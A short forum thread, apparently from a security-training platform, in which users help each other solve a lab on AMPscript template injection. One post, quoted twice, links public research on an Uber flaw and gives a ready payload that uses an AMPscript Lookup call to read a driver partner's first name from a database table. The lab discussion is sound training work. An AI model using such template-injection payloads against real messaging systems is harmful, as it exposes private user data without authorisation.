Forum Discussion
Bronze IIIThreat Research: AMPscript Analysis
so, base for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation
try for the message:
Message: %%[ SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....") ]%% Hi there I'm %%=V(@firstName)=%% and I created this tool.btw, you'll find all the nessesairy messages to solve the lab in the log. maybe you need to use cyberchef and urldecode.
Bronze IIIHi Netcat - yes thats exactly what I mean, I click on "preview" on the page web-hook.imlcabs.iml and I get "" unders JSON etc.
Thanks Steven - I had already got Q5 and Q6 - I'm stuck on how to populate the web application to pull back the name of the attacker, using the key 5*** - do you have some info around that?
Silver IIso, base for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation
try for the message:
Message:
%%[
SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....")
]%%
Hi there I'm %%=V(@firstName)=%% and I created this tool.btw, you'll find all the nessesairy messages to solve the lab in the log. maybe you need to use cyberchef and urldecode.
- GusC
Thanks Steve I'll give that a go today.
btw are you mrmouse? you must have a good score in IL!
